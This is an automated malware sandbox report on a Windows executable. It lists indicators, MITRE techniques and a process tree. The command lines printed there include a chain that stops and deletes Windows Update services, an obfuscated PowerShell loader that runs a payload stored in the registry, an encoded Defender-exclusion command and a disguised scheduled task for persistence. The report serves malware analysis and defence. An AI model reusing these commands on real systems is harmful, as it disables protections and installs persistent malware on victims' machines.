3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398

Analysis

max time kernel
301s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
01-09-2022 22:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe
Size

2.8MB
MD5

3acdc339d7a5d2758540325f7ad5055f
SHA1

d2d76492a236516d5c56eb5ca948f3d1fc0c77bc
SHA256

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398
SHA512

ba7323db77ab19f659697276fe763201e0d5f57d833c881c2e33286a75f4c117d14089aab5b871d2d9f8fb298f7bc3993b6ca75966aed7626336722cd3e30304
SSDEEP

49152:yjpxVhHNgD3GXZ5jrpaWeC1SQGi5kGKptdJ6qgedSuDcbGSDz2/Zm:ytfhH6D3IZJrpaLCrGi5rKp3JNPhiqBm

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exesvchost.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection = 22020100	svchost.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1680 created 420 1680 powershell.EXE winlogon.exe
PID 812 created 420 812 powershell.EXE winlogon.exe

description	pid	process	target process
PID 1680 created 420	1680	powershell.EXE	winlogon.exe
PID 812 created 420	812	powershell.EXE	winlogon.exe

Drops file in Drivers directory 1 IoCs

Processes:

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe

Executes dropped EXE 1 IoCs

Processes:

conhost.exe

pid process

484 conhost.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

548 takeown.exe
1368 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

548 takeown.exe
1368 icacls.exe

pid	process
484	conhost.exe

pid	process
548	takeown.exe
1368	icacls.exe

pid	process
548	takeown.exe
1368	icacls.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 980 set thread context of 484	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	conhost.exe
PID 1680 set thread context of 1008	1680	powershell.EXE	dllhost.exe
PID 812 set thread context of 1884	812	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe

description	ioc	process
File created	C:\Program Files\Platform\Defender\update.exe	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe
File opened for modification	C:\Program Files\Platform\Defender\update.exe	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe

Drops file in Windows directory 7 IoCs

Processes:

svchost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1204 sc.exe
288 sc.exe
1980 sc.exe
1064 sc.exe
680 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1092 schtasks.exe

pid	process
1204	sc.exe
288	sc.exe
1980	sc.exe
1064	sc.exe
680	sc.exe

pid	process
1092	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0066b9061bed801	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

568 reg.exe
808 reg.exe
884 reg.exe
1328 reg.exe
2020 reg.exe
472 reg.exe
1132 reg.exe
1056 reg.exe
1068 reg.exe

pid	process
568	reg.exe
808	reg.exe
884	reg.exe
1328	reg.exe
2020	reg.exe
472	reg.exe
1132	reg.exe
1056	reg.exe
1068	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe

pid	process
864	powershell.exe
980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe
1680	powershell.EXE
1680	powershell.EXE
812	powershell.EXE
1008	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
812	powershell.EXE
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe
1008	dllhost.exe
1008	dllhost.exe
1884	dllhost.exe
1884	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1372 Explorer.EXE

pid	process
1372	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exe3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	864	powershell.exe
Token: SeShutdownPrivilege	1676	powercfg.exe
Token: SeShutdownPrivilege	812	powercfg.exe
Token: SeShutdownPrivilege	2012	powercfg.exe
Token: SeShutdownPrivilege	1528	powercfg.exe
Token: SeTakeOwnershipPrivilege	548	takeown.exe
Token: SeDebugPrivilege	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe
Token: SeDebugPrivilege	1680	powershell.EXE
Token: SeDebugPrivilege	1680	powershell.EXE
Token: SeDebugPrivilege	812	powershell.EXE
Token: SeDebugPrivilege	1008	dllhost.exe
Token: SeDebugPrivilege	812	powershell.EXE
Token: SeDebugPrivilege	1884	dllhost.exe
Token: SeShutdownPrivilege	1372	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.execmd.execmd.execmd.exe

description	pid	process	target process
PID 980 wrote to memory of 864	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	powershell.exe
PID 980 wrote to memory of 864	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	powershell.exe
PID 980 wrote to memory of 864	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	powershell.exe
PID 980 wrote to memory of 1764	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 980 wrote to memory of 1764	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 980 wrote to memory of 1764	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 980 wrote to memory of 584	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 980 wrote to memory of 584	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 980 wrote to memory of 584	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 1764 wrote to memory of 1204	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 1204	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 1204	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 288	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 288	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 288	1764	cmd.exe	sc.exe
PID 584 wrote to memory of 1676	584	cmd.exe	powercfg.exe
PID 584 wrote to memory of 1676	584	cmd.exe	powercfg.exe
PID 584 wrote to memory of 1676	584	cmd.exe	powercfg.exe
PID 1764 wrote to memory of 1980	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 1980	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 1980	1764	cmd.exe	sc.exe
PID 980 wrote to memory of 1624	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 980 wrote to memory of 1624	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 980 wrote to memory of 1624	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 1764 wrote to memory of 1064	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 1064	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 1064	1764	cmd.exe	sc.exe
PID 584 wrote to memory of 812	584	cmd.exe	powercfg.exe
PID 584 wrote to memory of 812	584	cmd.exe	powercfg.exe
PID 584 wrote to memory of 812	584	cmd.exe	powercfg.exe
PID 1764 wrote to memory of 680	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 680	1764	cmd.exe	sc.exe
PID 1764 wrote to memory of 680	1764	cmd.exe	sc.exe
PID 1624 wrote to memory of 1092	1624	cmd.exe	schtasks.exe
PID 1624 wrote to memory of 1092	1624	cmd.exe	schtasks.exe
PID 1624 wrote to memory of 1092	1624	cmd.exe	schtasks.exe
PID 1764 wrote to memory of 472	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 472	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 472	1764	cmd.exe	reg.exe
PID 584 wrote to memory of 2012	584	cmd.exe	powercfg.exe
PID 584 wrote to memory of 2012	584	cmd.exe	powercfg.exe
PID 584 wrote to memory of 2012	584	cmd.exe	powercfg.exe
PID 1764 wrote to memory of 1132	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 1132	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 1132	1764	cmd.exe	reg.exe
PID 584 wrote to memory of 1528	584	cmd.exe	powercfg.exe
PID 584 wrote to memory of 1528	584	cmd.exe	powercfg.exe
PID 584 wrote to memory of 1528	584	cmd.exe	powercfg.exe
PID 1764 wrote to memory of 808	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 808	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 808	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 568	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 568	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 568	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 884	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 884	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 884	1764	cmd.exe	reg.exe
PID 1764 wrote to memory of 548	1764	cmd.exe	takeown.exe
PID 1764 wrote to memory of 548	1764	cmd.exe	takeown.exe
PID 1764 wrote to memory of 548	1764	cmd.exe	takeown.exe
PID 1764 wrote to memory of 1368	1764	cmd.exe	icacls.exe
PID 1764 wrote to memory of 1368	1764	cmd.exe	icacls.exe
PID 1764 wrote to memory of 1368	1764	cmd.exe	icacls.exe
PID 980 wrote to memory of 484	980	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	conhost.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:328

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1112

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
PID:892

C:\Windows\system32\taskeng.exe
taskeng.exe {696FA3B3-95A9-431B-8277-8FF938E5D2BB} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
- Modifies security service
PID:756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:596

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bea3eefc-ea4d-4d6a-a469-88e19d420c8d}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{357a4d67-b770-4b18-9a34-83f9f4c4b23e}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1972

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Users\Admin\AppData\Local\Temp\3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe
"C:\Users\Admin\AppData\Local\Temp\3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAaQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABsAGMAegAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBkAHoAeAAjAD4AIABAACgAIAA8ACMAZABvAGQAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGYAcABrACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGMAZgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGIAZwAjAD4A"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1204

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:288

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1980

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1064

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:680

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:472

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1132

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:568

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:808

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:884

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1368

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1328

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1056

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2020

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1068

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1000

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1348

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1192

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1520

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:920

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1456

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:584

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
3⤵
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
4⤵
- Creates scheduled task(s)
PID:1092

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe"
3⤵
PID:940

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:1948

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1316

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6161573341086250400-78312548-214823605-279929891495905437-5623718151147241803"
1⤵
PID:524

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
d85fc21aee00dbcfd1c6d54f4a8e331c

SHA1
